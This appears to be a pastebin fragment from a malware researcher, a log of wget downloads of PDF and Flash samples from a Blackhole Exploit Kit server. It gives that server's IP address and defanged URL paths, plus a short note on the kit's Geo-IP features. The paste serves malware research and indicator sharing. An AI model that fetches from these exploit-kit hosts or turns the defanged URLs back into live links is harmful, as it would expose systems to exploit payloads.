- 100%[==============================================================================>] 11,160 34.6K/s in 0.3s
- 2013-02-18 15:52:03 (34.6 KB/s) - `./pdf4.pdf' saved [11160/11160]
- // flash....
- --2013-02-18 15:54:34-- h00p://46.175.224.21:8080/forum/links/public_version.php?jwio=1h:1j:1j:32:1f&xnrj=3b:3l:37:3a:3k&ehn=1j:33:32:1l:1g:1i:1o:1n:1o:1i&fxqbltpx=cbfyrfg
- Connecting to 46.175.224.21:8080... connected.
- h00p request sent, awaiting response... 200 OK
- Length: 7981 (7.8K) [text/html]
- Saving to: `./flash1.swf'
- 100%[==============================================================================>] 7,981 26.7K/s in 0.3s
- 2013-02-18 15:54:36 (26.7 KB/s) - `./flash1.swf' saved [7981/7981]
- --2013-02-18 15:54:58-- h00p://46.175.224.21:8080/forum/links/public_version.php?ecxrx=1h:1j:1j:32:1f&pihpkcv=3h:39:36:39&tlouh=1j:33:32:1l:1g:1i:1o:1n:1o:1i&cuchmcv=bda
- Connecting to 46.175.224.21:8080... connected.
- h00p request sent, awaiting response... 200 OK
- Length: 1030 (1.0K) [text/html]
- Saving to: `./flash2.swf'
- 100%[==============================================================================>] 1,030 --.-K/s in 0s
- 2013-02-18 15:54:59 (35.5 MB/s) - `./flash2.swf' saved [1030/1030]
- --2013-02-18 15:55:14-- h00p://46.175.224.21:8080/forum/links/public_version.php?jsehhtfz=30:1n:1i:1i:33&rrhjmwf=32:3c:3a:3g:3d&ggrjtm=2v:1k:1m:32:33:1k:1k:31:1j:1o&vpx=mcms
- Connecting to 46.175.224.21:8080... connected.
- h00p request sent, awaiting response... 200 OK
- Length: 7981 (7.8K) [text/html]
- Saving to: `./flash3.swf'
- 100%[==============================================================================>] 7,981 25.5K/s in 0.3s
- 2013-02-18 15:55:15 (25.5 KB/s) - `./flash3.swf' saved [7981/7981]
- --2013-02-18 15:57:54-- h00p://46.175.224.21:8080/forum/links/public_version.php?efoo=30:1n:1i:1i:33&bpsmrsqj=3k:31:3f:35&sokgxr=2v:1k:1m:32:33:1k:1k:31:1j:1o&engay=zhpldpx
- Connecting to 46.175.224.21:8080... connected.
- h00p request sent, awaiting response... 200 OK
- Length: 1030 (1.0K) [text/html]
- Saving to: `./flash4.swf'
- 100%[==============================================================================>] 1,030 --.-K/s in 0s
- 2013-02-18 15:57:55 (36.2 MB/s) - `./flash4.swf' saved [1030/1030]
- =========================
- It has Geo-IP functions built in in BHEK...
- Reference: http://ondailybasis.com/blog/?p=1483
- =======================-
- ----
- #MalwareMustDie | @unixfreaxjp
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement